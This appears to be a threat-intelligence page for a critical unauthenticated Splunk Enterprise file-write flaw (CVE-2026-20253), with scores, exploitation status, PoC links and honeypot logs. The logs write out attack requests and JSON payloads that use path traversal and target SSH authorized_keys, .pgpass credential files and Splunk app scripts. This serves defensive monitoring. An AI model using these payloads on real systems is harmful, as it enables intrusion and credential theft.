Vulnerability Detail
Enriched intelligence for a single CVE
9.8
CVSS
Critical
Critical
CVE-2026-20253
PUBLISHEDUnauthenticated Arbitrary File Creation and Truncation in a PostgreSQL Sidecar Service Endpoint in Splunk Enterprise
Not yet in CISA KEV
Exploited in the wild
Active exploitation observed
PoC available
Remote
Low complexity
No user interaction
Unauthenticated
- Vendor
- Splunk
- Product
- Splunk Enterprise, Splunk Cloud Platform
- Published
- Jun 10, 2026
- EPSS
- 0.1% · 21% pctl
Automate This Intelligence with the Pro API
Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.
Description
In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint.The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.
postgresql
Weaknesses (CWE)
-
Missing Authentication for Critical Function
CVSS Scores
CVSS v3.1
9.8 Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation Status
Exploited in the wild
Recorded 2026-06-15 05:15:25 UTC · KEVIntel
Active exploitation observed
Recorded 2026-06-15 05:15:25 UTC · KEVIntel sensor
Proof of concept available
Recorded 2026-06-12 10:04:32 UTC · GitHub
Observed Exploitation Attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
High confidence
Active exploitation observed
- Attempts Observed
- 55
- Unique Attacker IPs
- 11
- Attacker Countries
- 🇫🇷 🇭🇰 🇰🇷 🇸🇬 🇺🇸 🇻🇳
- Sensors Observed
- 2
Exploitation Attempts Over the Last 30 Days
Loading...
First observed 2026-06-15 05:15 UTC · Last observed 2026-06-15 16:25 UTC
Recent Attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | Confidence | Raw Event |
|---|---|---|---|---|---|
|
2026-06-15 16:25 UTC
about 2 hours ago
|
🇸🇬 35.197.128.152Singapore, Singapore |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.32.4
|
High |
View Hide
Attacker
35.197.128.152
🇸🇬
Singapore, Singapore
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
python-requests/2.32.4
Payload fingerprint
sha256:5732074a5a0fd3fb7448a3d53918eec4f815a476d8653222e4b886a1b4edaf0c
Payload
{"database": "search_metadata", "backupFile": "cve_2026_20253_detection_probe"}
Source
KEVIntel Honeypot
|
|
2026-06-15 15:54 UTC
about 3 hours ago
|
🇺🇸 35.225.104.130Council Bluffs, Iowa, United States |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.32.4
|
High |
View Hide
Attacker
35.225.104.130
🇺🇸
Council Bluffs, Iowa, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
python-requests/2.32.4
Payload fingerprint
sha256:736587e420cc53699ee129d05e94bc1b81824d23791f9fb67b0e5ba19da986f2
Payload
{"backupFile": "cve_2026_20253_detection_probe", "database": "probe_check"}
Source
KEVIntel Honeypot
|
|
2026-06-15 15:22 UTC
about 3 hours ago
|
🇺🇸 35.252.131.69The Dalles, Oregon, United States |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.32.4
|
High |
View Hide
Attacker
35.252.131.69
🇺🇸
The Dalles, Oregon, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
python-requests/2.32.4
Payload fingerprint
sha256:736587e420cc53699ee129d05e94bc1b81824d23791f9fb67b0e5ba19da986f2
Payload
{"backupFile": "cve_2026_20253_detection_probe", "database": "probe_check"}
Source
KEVIntel Honeypot
|
|
2026-06-15 13:15 UTC
about 5 hours ago
|
🇭🇰 8.218.74.160Hong Kong, Hong Kong Seen 6 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.26.0
|
High |
View Hide
Attacker
8.218.74.160
🇭🇰
Hong Kong, Hong Kong
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
python-requests/2.26.0
Payload fingerprint
sha256:21b73b887985d20779294f986a97f89d244737aab3de01f76f157c82dcf65e67
Payload
{"database": "search_metadata", "backupFile": "/home/splunk/.ssh/authorized_keys", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}
Source
KEVIntel Honeypot
|
|
2026-06-15 13:12 UTC
about 5 hours ago
|
🇺🇸 34.11.20.243Washington, District of Columbia, United States |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Mozilla/5.0 (SecurityAssessment/CVE-2026-20253-Probe)
|
High |
View Hide
Attacker
34.11.20.243
🇺🇸
Washington, District of Columbia, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Mozilla/5.0 (SecurityAssessment/CVE-2026-20253-Probe)
Payload fingerprint
sha256:10e7a0ce6d1004ecfb31d60b67f518da61385a9d158628d853d183a781626d06
Payload
{"database": "probe_check", "backupFile": "cve_2026_20253_detection_probe"}
Source
KEVIntel Honeypot
|
|
2026-06-15 13:11 UTC
about 5 hours ago
|
🇭🇰 8.218.74.160Hong Kong, Hong Kong Seen 6 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.26.0
|
High |
View Hide
Attacker
8.218.74.160
🇭🇰
Hong Kong, Hong Kong
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
python-requests/2.26.0
Payload fingerprint
sha256:878a5c2451af43d6c496d1948789c7ced715d1d9a5f6938f136f7dece4d4eece
Payload
{"database": "search_metadata", "backupFile": "/opt/splunk/etc/apps/.../payload.py", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:25 UTC
about 6 hours ago
|
🇭🇰 8.218.74.160Hong Kong, Hong Kong Seen 6 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.26.0
|
High |
View Hide
Attacker
8.218.74.160
🇭🇰
Hong Kong, Hong Kong
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
python-requests/2.26.0
Payload fingerprint
sha256:ab577c353deda5c94ed46a3c01113828bf831ff504b72cae2f5be44e4110c0ea
Payload
{"database": "search_metadata", "backupFile": "/home/splunk/.ssh/authorized_keys"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:25 UTC
about 6 hours ago
|
🇭🇰 8.218.74.160Hong Kong, Hong Kong Seen 6 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.26.0
|
High |
View Hide
Attacker
8.218.74.160
🇭🇰
Hong Kong, Hong Kong
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
python-requests/2.26.0
Payload fingerprint
sha256:21b73b887985d20779294f986a97f89d244737aab3de01f76f157c82dcf65e67
Payload
{"database": "search_metadata", "backupFile": "/home/splunk/.ssh/authorized_keys", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:19 UTC
about 6 hours ago
|
🇭🇰 8.218.74.160Hong Kong, Hong Kong Seen 6 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
python-requests/2.26.0
|
High |
View Hide
Attacker
8.218.74.160
🇭🇰
Hong Kong, Hong Kong
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
python-requests/2.26.0
Payload fingerprint
sha256:43880c333b8d86420727b9ed2d01ebc0cfde001aed7f81e66d621b9907c19627
Payload
{"database": "search_metadata", "backupFile": "/path/to/target/file.py", "passfile": "/opt/splunk/var/packages/data/postgres/.pgpass"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:16 UTC
about 6 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:f6cc8ad01dcd4394b4a8aa9539b3dffa900f4fdb570b65efe5fb4b5ea1a71421
Payload
{"database": "splunk", "backupFile": "/../../../root/.ssh/authorized_keys"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:16 UTC
about 6 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:54e0eb57b3c221d156d3841c19440e8f6f9f5e07cd212b0b467896b05cad0d19
Payload
{"database": "splunk", "backupFile": "/../../../opt/splunk/etc/passwd"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:16 UTC
about 6 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:e9382e3524bdbe5518b27ee7bdeedff0f8569ce844d5913d5985dfac162fb2da
Payload
{"database": "splunk", "backupFile": "/../../../opt/splunk/etc/system/local/inputs.conf"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:16 UTC
about 6 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:d78361a1bc6460dd68baa6260abd0aed7b519e6f46a15b261166de1d289ef88a
Payload
{"database": "splunk", "backupFile": "/../../../opt/splunk/etc/system/local/authentication.conf"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:16 UTC
about 6 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:e052d59d02047288e0eeed40e132eb4d592ab10027f1e912314f735aa97d650a
Payload
{"database": "splunk", "backupFile": "/../../../etc/passwd"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:16 UTC
about 6 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:574e60494cefaf2942ee7ee8a61263e848c674ee2f6deded64f9198091717c3b
Payload
{"database": "splunk", "backupFile": "/opt/splunk/var/lib/splunk/backup/splunk_creds.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:14 UTC
about 6 hours ago
|
🇭🇰 8.218.74.160Hong Kong, Hong Kong Seen 6 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
python-requests/2.26.0
|
High |
View Hide
Attacker
8.218.74.160
🇭🇰
Hong Kong, Hong Kong
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
python-requests/2.26.0
Payload fingerprint
sha256:4b678627c4321005db27d4a9d75587a20ca12b2340ed55e97ed5c0a7952ad00c
Payload
{"database": "search_metadata", "backupFile": "/opt/splunk/etc/apps/search/bin/malicious_input.py"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/restore
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:0e711a12d975e1a65f03ab375b9fa95076de89bcbdf1dd0931dc9b7e69c909cb
Payload
{"database": "splunk", "backupFile": "/tmp/test.bak", "targetDir": "/opt/splunk/etc/auth"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:7059a1598a5b7e890d52fef6898e1f3418ed4ea65c296b4dbb0a1c8e5dd0cb6c
Payload
{"database": "summary", "backupFile": "/tmp/summary_dump.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:c88a18ad6710ac7abd7c4963fd61a287f171420c242709e01cc85f71de01373b
Payload
{"database": "main", "backupFile": "/tmp/main_dump.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:6b6bf1d0757bd9f0cf228fb6ba79e8599595b8d27992a5039bf95939bd458c61
Payload
{"database": "postgres", "backupFile": "/tmp/postgres_dump.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:bfa6d4666b65d67f7572d28eb3f2af77725f86c94a625f29d6a7e1851180d850
Payload
{"database": "splunk", "backupFile": "/tmp/splunk_dump.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /splunkd/__raw/v1/postgres/recovery/restore
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /splunkd/__raw/v1/postgres/recovery/restore
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:21d14999f118ad165e2324c7a9f8b2db50d149bd30043f8c9527079d849bb531
Payload
{"database":"splunk","backupFile":"/tmp/x.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /splunkd/__raw/v1/postgres/recovery/backup
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /splunkd/__raw/v1/postgres/recovery/backup
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:2372a350478d2162f6b89b0c94e82d2d711a923ee0360b7398d2e8c6fcd522b0
Payload
{"database":"splunk","backupFile":"/tmp/x.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/execute
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/execute
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:e9a59524ed7f3cfe9f1d3a4256caf01f78012c577872c754a9561758f1d61164
Payload
{"database":"splunk","backupFile":"/tmp/x.bak"}
Source
KEVIntel Honeypot
|
|
2026-06-15 11:53 UTC
about 7 hours ago
|
🇺🇸 154.16.27.85San Jose, California, United States Seen 24 times |
🇪🇺
Splunk Enterprise
|
POST /en-US/splunkd/__raw/v1/postgres/tables
Python-urllib/3.10
|
High |
View Hide
Attacker
154.16.27.85
🇺🇸
San Jose, California, United States
Request
POST /en-US/splunkd/__raw/v1/postgres/tables
User-Agent
Python-urllib/3.10
Payload fingerprint
sha256:f7c824b95ffb2d201fa84df9b7bf869ec0992ba58fd1886105ba64ed41b41ce5
Payload
{"database":"splunk","backupFile":"/tmp/x.bak"}
Source
KEVIntel Honeypot
|
Known Exploited Vulnerability Sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| KEVIntel First | 2026-06-15 05:15 UTC |
Scanner Integrations
| Scanner | Reference | Detected |
|---|---|---|
| Nuclei | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-20253.yaml | Jun 15, 2026 |
Recent Mentions
Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication
TheHackerNews · Jun 13, 2026
Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution. The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system. "In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary
Why Use App-Level Auth When Every Database Has Auth? (Splunk Enterprise CVE-2026-20253 Pre-Auth RCE)
Watchtower Labs · Jun 12, 2026
Three posts? In three days? Are we insane?We're home alone, there's no one to stop us, and we're up past bedtime. So, we need to talk about Splunk. On June 10th, Splunk published this CVE-2026-20253 advisory:It has everything that we
Potential Proof of Concepts
These PoCs are unverified and could contain malware. Use at your own risk.
watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
github · Created 2026-06-12 10:04:32 UTC · 2 stars
Splunk Enterprise & Cloud Platform - Unrestricted File Upload
nuclei · Created Unknown
Timeline
-
Added to KEVIntel
-
Detected by Nuclei
-
Proof of Concept Exploit Available
-
CVE Published to Public
-
CVE ID Reserved